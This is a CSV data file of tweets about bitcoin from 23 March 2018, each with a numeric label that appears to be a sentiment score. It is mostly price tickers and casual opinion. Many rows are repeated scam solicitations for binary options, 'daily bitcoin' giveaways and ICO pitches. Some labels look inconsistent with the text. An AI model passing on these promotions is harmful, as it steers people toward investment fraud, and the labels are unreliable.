2018,"@footballman58 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:59:02 +0000 2018,"This Easter i will be helping my Maglera people get involved in bitcoin mining #oneONone +😎 😎 😎",0.0 +Fri Mar 23 07:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27838.31 | LITECOIN(MCDTBC) R$573.33000000,0.0 +Fri Mar 23 07:59:09 +0000 2018,@Join_Civil Fed up with all this Blockchain/Bitcoin hucksterism. Used to watch Max Keizer but bitcoin drove me away. Don’t trust any of it.,0.0 +Fri Mar 23 07:59:49 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,431.17, market cap of $142,778,491,482 (44.43%), and 24 hr vol. of $5,557,890,000 (37.79%)",0.0 +Fri Mar 23 08:00:00 +0000 2018,"This just in: Bitcoin is rising! +Current Rate: 8395.54 USD = 1 BTC",0.0 +Fri Mar 23 08:00:01 +0000 2018,"Mar 23, 2018 01:00AM #Bitcoin Price: +USD 8620.63 | EUR 7001.33 | JPY 911884.88",0.0 +Fri Mar 23 08:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,443.60 +Change in 1h: +0.18% +Market cap: $142,988,988,560.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 08:00:01 +0000 2018,Current BTC Dominance: 44.49% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 08:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,395.54, EUR 6,813.57",-1.0 +Fri Mar 23 08:00:03 +0000 2018,"1 bitcoin = $8443.6 / 6845.488€ +1 bitcoin-cash = $970.001 / 786.409€ +1 ethereum = $514.614 / 417.213€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:00:02 +0000 2018,"Bitcoin:$8443.6 +Ethereum:$515.299 +Bitcoin Cash:$971.412 +Litecoin:$158.261 +Ripple:$0.630542 +IOTA:$1.25788",0.0 +Fri Mar 23 08:00:03 +0000 2018,"1 bitcoin = $8443.6 / 6845.488€ +1 bitcoin-cash = $970.001 / 786.409€ +1 ethereum = $514.614 / 417.213€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:00:12 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$23.0M; Support til $8100:$52.1M $BTC $BTCUSD #bitcoin #orderbook #finance #crypto,1.0 +Fri Mar 23 08:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8399.68/$8409.04 #Bitstamp +$8395.20/$8398.92 #Kraken +⇢$-13.84/$-0.76 +$8353.02/$8442.01 #Coinbase +⇢$-56.02/$42.33",0.0 +Fri Mar 23 08:00:14 +0000 2018,$ETH / $BTC marketcap ratio = 35.5% #bitcoin #cryptocurrency,0.0 +Fri Mar 23 08:00:17 +0000 2018,2018-03-23 08:00 UTC Bitcoin Price: 8395.52 USD,0.0 +Fri Mar 23 08:00:23 +0000 2018,"@SimonBotes @brett_stclair Doubt it’ll happen - why reinvent the wheel when we already have Bitcoin, Monero, etc?",0.0 +Fri Mar 23 08:00:26 +0000 2018,#XEM Price is 0.00003276 (-0.00000010) #BTC / 0.275143 (-0.00148) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:28 +0000 2018,#SUB Price is 0.00004518 (+0.00000028) #BTC / 0.379461 (+0.00149) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:29 +0000 2018,#EOS Price is 0.00076389 (-0.00001458) #BTC / 6.41541 (-0.10976) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:29 +0000 2018,#ADA Price is 0.00002235 (-0.00000028) #BTC / 0.187662 (-0.00203) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:30 +0000 2018,"BTC hourly update +$8403.88 | +0.0011%📈 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 08:00:30 +0000 2018,#DASH Price is 0.0474086 (-0.00009870) #BTC / 398.154 (-0.05400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:43 +0000 2018,#Bitcoin Price 8395.00 USD via Chain,0.0 +Fri Mar 23 08:00:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:00:48 +0000 2018,Current price of Bitcoin is $8395.00.,0.0 +Fri Mar 23 08:00:49 +0000 2018,Current price of Bitcoin is $8395.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 08:00:52 +0000 2018,"#Bitcoin $8,403.49 v #BitcoinCash $969.54 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 17:00JST",0.0 +Fri Mar 23 08:00:55 +0000 2018,They said the internet would make the world a better place. They was right. $crypto $BTC #bitcoin,1.0 +Fri Mar 23 08:01:04 +0000 2018,@WhalePanda Selling Bitcoin for BCash is actually very brave. (for different reasons),1.0 +Fri Mar 23 08:01:21 +0000 2018,Current price of Bitcoin is 8395.00 USD,0.0 +Fri Mar 23 08:01:26 +0000 2018,So.... Bitcoin Crash is Twerking Complete!!!,1.0 +Fri Mar 23 08:01:27 +0000 2018,Current price of Bitcoin is $8395.00,0.0 +Fri Mar 23 08:01:34 +0000 2018,"Market Update: +Bitcoin - $8,443.60 +Bitcoin Cash - $971.41 +Ethereum - $515.30 +Litecoin - $158.26 +Ripple - $0.63 +#Cryptos",0.0 +Fri Mar 23 08:01:42 +0000 2018,Bitcoin 8395.00 $,0.0 +Fri Mar 23 08:01:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:02:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:02:11 +0000 2018,Current price of #Bitcoin is $8395.00,0.0 +Fri Mar 23 08:02:13 +0000 2018,"As of March 23, 2018 at 09:00AM, Bitcoin is valued at $8395.00. #cryptocurrencies #cryptofinance24 $BTC #Bitcoin",0.0 +Fri Mar 23 08:02:21 +0000 2018,The current price of Bitcoin is $8395.00 $BTC How's your wallet?,0.0 +Fri Mar 23 08:02:24 +0000 2018,"@LeNuitRenard @Crypto_Wax @LordRapt0rJesus @ProfFaustus Out of interest, what do you use bitcoin cash to buy?",0.0 +Fri Mar 23 08:02:43 +0000 2018,"Bitcoin percentage of market cap: 44.45 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 08:03:05 +0000 2018,Current price of Bitcoin is $8395.00 via Chain,0.0 +Fri Mar 23 08:03:12 +0000 2018,Current price of #Bitcoin is $8395.00 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 08:03:12 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!!",1.0 +Fri Mar 23 08:03:42 +0000 2018,"BITCOIN is stuck at 8,400 USD and cannot move from there. Get ready for another PRICE DROP. We would expect to see it around 5,000 USD soon.",1.0 +Fri Mar 23 08:04:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:04:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:04:34 +0000 2018,@rogerkver Bitcoin cash? Bahahaha... it’s bcash fool.,0.0 +Fri Mar 23 08:06:15 +0000 2018,Bitcoin please,0.0 +Fri Mar 23 08:06:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:06:57 +0000 2018,"@Cylinders_io Wonderful project! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:06:58 +0000 2018,@rogerkver Just in case you missed it roger. Everyone hates bcash. You lost. Bitcoin won!⚡️🏆,0.0 +Fri Mar 23 08:08:31 +0000 2018,$BTCUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 08:09:06 +0000 2018,BTC $8443.60 Up +$28.21 +0.33% in the last hour #bitcoin #bitsmart,0.0 +Fri Mar 23 08:09:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:09:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:09:30 +0000 2018,Does anyone know how to buy bitcoin that could help me,0.0 +Fri Mar 23 08:10:02 +0000 2018,"Get your ROCKET Coin Now!The Coin of ICO Advisers +#theicorocket #ICO #bitcoin #blockchain +#theicorocket #rocket #ico #presale #investment",0.0 +Fri Mar 23 08:10:03 +0000 2018,"1 bitcoin = $8443.71 / 6845.577€ +1 bitcoin-cash = $972.342 / 788.307€ +1 ethereum = $517.157 / 419.275€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.435,220 +1 Hour: 0.02 % | 24 Hours: -6.39 % | 7 Days: 2.70 % +#btc #bitcoin",0.0 +Fri Mar 23 08:10:30 +0000 2018,SIdeways movements. I have no large position. I just hope Bitcoin does not crash.,-1.0 +Fri Mar 23 08:10:55 +0000 2018,@officialmcafee @theemrsmcafee How do you walk with those balls of steel? #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL,0.0 +Fri Mar 23 08:10:57 +0000 2018,"@2B7C89526 So if we all stop eating and using bitcoin, we will end heart disease and obesity as well as money laundering and crime.",0.0 +Fri Mar 23 08:11:06 +0000 2018,@siosism @rogerkver bitcoin private is real bitcoin cash,1.0 +Fri Mar 23 08:11:32 +0000 2018,Bitcoin value: $8456.11,0.0 +Fri Mar 23 08:11:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:11:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:12:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:12:37 +0000 2018,"@klr_reno if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:13:16 +0000 2018,@CryptoJuan36 @jonny5crypto To get more bitcoin,1.0 +Fri Mar 23 08:13:35 +0000 2018,Bitcoin is joss,0.0 +Fri Mar 23 08:13:41 +0000 2018,"@castillo19460 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:14:24 +0000 2018,"Bitcoin price resistance points +$9280 -> $11300 -> $12900 -> $14500 -> $16900 -> $19800",0.0 +Fri Mar 23 08:14:25 +0000 2018,Retweet if you agree. Bitcoin is cyber snob currency . #bitcoin #bitcointrading,0.0 +Fri Mar 23 08:14:56 +0000 2018,"Current Bitcoin Price = $9509.67 --- Includes Sum of Forks, Core $8478.00 (89.15%) + Cash $974.68 (10.25%) + Gold $56.99 (0.60%)",0.0 +Fri Mar 23 08:15:01 +0000 2018,"@CatsofVelvet if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:15:02 +0000 2018,"The current price of Bitcoin is $8443.71. +The current price of BCash is $972.342, or 0.115549 BTC",0.0 +Fri Mar 23 08:15:37 +0000 2018,"@Bryana42535010 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:01 +0000 2018,ICX is now £2.68. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 08:16:16 +0000 2018,"@DeplorableLilly if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:27 +0000 2018,"Do not miss the opportunity to invest in a project, as I do. +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",0.0 +Fri Mar 23 08:16:30 +0000 2018,"(📫) - Does Mario like Bitcoin. +Pages: 1, 2, ... 691, 692",0.0 +Fri Mar 23 08:16:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:16:40 +0000 2018,"@66fiveandahalf if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:52 +0000 2018,@k_keren @wmd4x buy bitcoin and hodl they say...,0.0 +Fri Mar 23 08:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$971,616 +1 Hour: 0.06 % | 24 Hours: -7.25 % | 7 Days: 5.27 % +#bch #bitcoin cash",0.0 +Fri Mar 23 08:17:26 +0000 2018,"@rogerkver @Falkvinge I’m not a super big Bitcoin Cash fan, but seeing all these hateful responses actually makes me want to buy more of it.",1.0 +Fri Mar 23 08:17:31 +0000 2018,"@alexiou88888888 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:17:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8488.51 #bitcoin,0.0 +Fri Mar 23 08:18:01 +0000 2018,"@Ingrid1Ser if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:18 +0000 2018,The Guardian economist has the right to analyze one bitcoin exchange often,1.0 +Fri Mar 23 08:18:20 +0000 2018,"@caylynmira if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:56 +0000 2018,"@curlymichelle48 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:56 +0000 2018,"The future is here, do not miss the new opportunities, join us! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:19:15 +0000 2018,"@McKenna25908429 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:19:29 +0000 2018,"Merry smiled. ''Well then,'' he said, ''There is now 1.000.000 of US debt for every #bitcoin that will ever be mined.''",1.0 +Fri Mar 23 08:19:37 +0000 2018,@monsterbitar @Bitcoin What if aliens invade us?👽 I think this is more likely!,1.0 +Fri Mar 23 08:19:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:19:45 +0000 2018,"@TatianaGlobal if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:20:04 +0000 2018,"1 bitcoin = $8476.72 / 6872.339€ +1 bitcoin-cash = $981.85 / 796.016€ +1 ethereum = $522.52 / 423.623€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:20:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:20:13 +0000 2018,"@WhalePanda BCH : Bitcoin Douche +I feel sorry for the guys owning BCH bags",-1.0 +Fri Mar 23 08:20:38 +0000 2018,"Very strong team of specialists in this field, I recommend! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:20:38 +0000 2018,I GOT 1 BITCOIN,0.0 +Fri Mar 23 08:21:06 +0000 2018,"@DragoranHS Oslo, only 15 minutes in and it’s more monkaS than watching bitcoin tank.",1.0 +Fri Mar 23 08:21:49 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:22:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:23:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:23:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:24:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:24:43 +0000 2018,Pro Tip: Consider looking at inverted charts from time to time to eliminate bias in your trading. $BTC #Bitcoin,0.0 +Fri Mar 23 08:25:05 +0000 2018,"@ebmccormack if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:25:14 +0000 2018,"@hashflare @aBitGreedy_ It's legit. However, if the price of bitcoin is under 8000, there is no hope for a return on investment.",0.0 +Fri Mar 23 08:25:19 +0000 2018,@buzzyNZ Ahhh yes someone invests $1K in bitcoin and all of a sudden they are a cryptocurrency guru..,0.0 +Fri Mar 23 08:25:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:26:01 +0000 2018,"#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, 3 Places to Park For $5 Or Less at a Detroit Tiger's Game at Comerica Park...",-1.0 +Fri Mar 23 08:26:04 +0000 2018,Bitcoin feels like a virtual Las Vegas!,0.0 +Fri Mar 23 08:26:21 +0000 2018,"฿ value over 1 year: +765.92%, (+$7449.41) [Currently $8422.015] #bitcoin",0.0 +Fri Mar 23 08:26:25 +0000 2018,You can't stop things like Bitcoin. It will be everywhere and the world will have to readjust #quotes #bitcoinquotes #bitcoin #btc,0.0 +Fri Mar 23 08:26:31 +0000 2018,@cryptomanran Bitcoin futures....Since they introduced those the market got screwed by manipulation.,0.0 +Fri Mar 23 08:26:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:27:47 +0000 2018,"Mark position for: 1 Bitcoin = $ 100,009.69 USD This has to happen!",0.0 +Fri Mar 23 08:28:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:28:05 +0000 2018,@nycjim Stock crack guys. Buy bitcoin now,0.0 +Fri Mar 23 08:28:27 +0000 2018,@zebpay TCC {The Champ coin } Top crypto currency in india after 2-3 year The next bitcoin,1.0 +Fri Mar 23 08:29:15 +0000 2018,"@purplerypple @DiaryofaMadeMan Here's a safer bet, BUY BITCOIN!",0.0 +Fri Mar 23 08:29:19 +0000 2018,Current price of Bitcoin is $8395.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 08:29:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:30:02 +0000 2018,"Bitcoin:$8524.83 +Ethereum:$524.005 +Bitcoin Cash:$985.372 +Litecoin:$159.946 +Ripple:$0.637726 +IOTA:$1.28154",0.0 +Fri Mar 23 08:30:04 +0000 2018,"1 bitcoin = $8524.83 / 6911.343€ +1 bitcoin-cash = $985.372 / 798.871€ +1 ethereum = $524.005 / 424.827€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:30:04 +0000 2018,"Bitcoin is a set of rules, not just a form of money. Currency is only the first application.",1.0 +Fri Mar 23 08:30:04 +0000 2018,One Bitcoin now worth $8484.21@bitstamp. High $9025.000. Low $8342.000. Market Cap $143.673 Billion #bitcoin,1.0 +Fri Mar 23 08:30:26 +0000 2018,#DASH Price is 0.0473969 (-0.00001170) #BTC / 402.1 (+3.94600) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:28 +0000 2018,#ADA Price is 0.00002264 (+0.00000029) #BTC / 0.19208 (+0.00442) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:30 +0000 2018,#XEM Price is 0.00003308 (+0.00000032) #BTC / 0.280236 (+0.00509) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:30 +0000 2018,#SUB Price is 0.00004504 (-0.00000014) #BTC / 0.381613 (+0.00215) #USD. Market rank is 118. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:31 +0000 2018,#EOS Price is 0.00078584 (+0.00002195) #BTC / 6.66679 (+0.25138) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 08:31:02 +0000 2018,MANA is now £0.06. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 08:31:05 +0000 2018,How many retweets for 1 Bitcoin sir? @MBuhari,1.0 +Fri Mar 23 08:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8532.48 as of Fri Mar 23 03:31:10 CDT 2018",0.0 +Fri Mar 23 08:31:32 +0000 2018,Bitcoin value: $8496.63,0.0 +Fri Mar 23 08:32:43 +0000 2018,"just all-in BCH. Bitcoin Cash. Bcash . Whatever , im here to profit or rekt.",0.0 +Fri Mar 23 08:33:07 +0000 2018,"Already more than 2.600 members are part of #XATRA community!, thank you. #XTR #ICO #XATRA #Blockchain #Coin # BTC # Bitcoin #ETH #Ethereum",1.0 +Fri Mar 23 08:33:17 +0000 2018,"widrowEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:33:25 +0000 2018,A project with great prospects and opportunities. I place great hopes on him #ICO #blockchain #bitcoin #TokenSale #UTEMIS,1.0 +Fri Mar 23 08:33:27 +0000 2018,"@mchooyah 2 word Printing Press , perfect solution for massive paper devaluation (Venezuela) HODL Bitcoin .",1.0 +Fri Mar 23 08:33:30 +0000 2018,"The #BitcoinPizza would be worth US$85,248,300.00 right now (down -5.21% in the last 24 hours): #Bitcoin",1.0 +Fri Mar 23 08:33:33 +0000 2018,hackers in Atlanta need da Bitcoin or else,0.0 +Fri Mar 23 08:33:42 +0000 2018,So @Densonology you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect Chris much appreciated,1.0 +Fri Mar 23 08:34:26 +0000 2018,"i can't say the phrase ""borrow me bitcoin"" in my head without it turning into a YARRRRRRR-y pirate voice",0.0 +Fri Mar 23 08:35:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:35:49 +0000 2018,Bitcoin-seeking Hackers Infect Atlanta’s Computers Marking First Such Attack on the Capital of the South -,1.0 +Fri Mar 23 08:36:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:00 +0000 2018,Bitcoin historic crash below 395,0.0 +Fri Mar 23 08:37:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:35 +0000 2018,"Bitcoin maximalists: it's all broken, and no, we can't tell you why.",-1.0 +Fri Mar 23 08:37:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:53 +0000 2018,"Optimal tx fee: 15 satoshi per byte. +BTC : $8482 / €6884 / £6015 @ Block 514768. +Market Cap: 143.58B USD. #Bitcoin #Finance",0.0 +Fri Mar 23 08:37:58 +0000 2018,@Aj_anwuli @MBuhari I have plans for the Bitcoin 😒,0.0 +Fri Mar 23 08:38:02 +0000 2018,"Join the ICO prospective project! 🤠❣️ +#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 08:38:29 +0000 2018,#ff @drei4u @drei4ucalls Bitcoin Master is his real name and occupation,1.0 +Fri Mar 23 08:39:16 +0000 2018,Bitcoin news sentiment changed to Positive in the last hour #bitcoin #bitsmart,1.0 +Fri Mar 23 08:39:39 +0000 2018,Bitcoin historic money laundering crash probe below 595,0.0 +Fri Mar 23 08:40:03 +0000 2018,"1 bitcoin = $8526.75 / 6912.9€ +1 bitcoin-cash = $990.092 / 802.698€ +1 ethereum = $522.539 / 423.639€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:40:11 +0000 2018,"$BTC 💵 price: $8528.99 1.00000BTC +1h: +1.09% 📈 +1d: -4.97% 🔻 +7d: +3.59% 📈 +👾 #Bitcoin 24h volume: $5,683,100,000",0.0 +Fri Mar 23 08:40:46 +0000 2018,"Mohammed 647Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:41:19 +0000 2018,The market is bear till your 40 years old uncle asks you about how to buy bitcoin.,1.0 +Fri Mar 23 08:41:22 +0000 2018,"฿ value over 3 months: --40.14%, ($-5688.01) [Currently $8481.995] #bitcoin",0.0 +Fri Mar 23 08:41:26 +0000 2018,"@NicKanali Good. + +Virtual currency is a catch all term for both bonga points and bitcoin and ingame tokens like WoW coins",1.0 +Fri Mar 23 08:41:50 +0000 2018,#Twitter and #Square CEO has seen the fortunes of the latter company change dramatically on #bitcoin enthusiasm.,0.0 +Fri Mar 23 08:41:52 +0000 2018,@Elyz38581503 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:42:16 +0000 2018,@CristKaytlynn if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:42:52 +0000 2018,@RohanKothekar09 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:43:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:43:14 +0000 2018,#bitcoin 28k in play,0.0 +Fri Mar 23 08:43:20 +0000 2018,@Jilliemary if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:43:48 +0000 2018,Bitcoin mining farm,0.0 +Fri Mar 23 08:44:12 +0000 2018,@MukhtarBilal2 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:44:14 +0000 2018,"#Bitcoin #Trading Protip: Right click the price bar on the right. Left click ""countdown."" Now you can see how long until the candle closes.",1.0 +Fri Mar 23 08:44:22 +0000 2018,@2B7C89526 Insult. Why would anyone who actually has any understanding of it have good things to say about Bitcoin?,1.0 +Fri Mar 23 08:44:43 +0000 2018,@DH1278 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:45:16 +0000 2018,@youngjaydanny if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:45:43 +0000 2018,Ion know who’s behind this but I want in ! Ion even know how to work Bitcoin 😭,-1.0 +Fri Mar 23 08:45:53 +0000 2018,If only #Bitcoin was as stable as the South African Rand 😂🤣😂🤣,0.0 +Fri Mar 23 08:46:21 +0000 2018,@WhalePanda Ver always chooses Friday afternoon to attack the bitcoin network,0.0 +Fri Mar 23 08:46:43 +0000 2018,@GarciaDerek4 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:47:21 +0000 2018,@oney2030 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:48:04 +0000 2018,@RichardHeartWin Twitter Protip: Don’t buy ICO’s. Buy Bitcoin.,0.0 +Fri Mar 23 08:48:06 +0000 2018,BITCOIN IS AT 8521.015,0.0 +Fri Mar 23 08:48:09 +0000 2018,"#Thrive public sale is still live. +2 days left, 85% cap reached. +#ico #ethereum #bitcoin",1.0 +Fri Mar 23 08:48:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:49:13 +0000 2018,@Cryptodirewolf The evolution of #bitcoin relies on the ability to “trust”,0.0 +Fri Mar 23 08:49:29 +0000 2018,"@WhalePanda This is the end boy. Pack it up, Bitcoin is dead.",-1.0 +Fri Mar 23 08:50:03 +0000 2018,"1 bitcoin = $8525.41 / 6911.814€ +1 bitcoin-cash = $988.618 / 801.503€ +1 ethereum = $523.947 / 424.78€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:50:23 +0000 2018,@CryptoTutor What does this mean for Bitcoin and altcoins? Is there an altseason coming this year?,-1.0 +Fri Mar 23 08:50:25 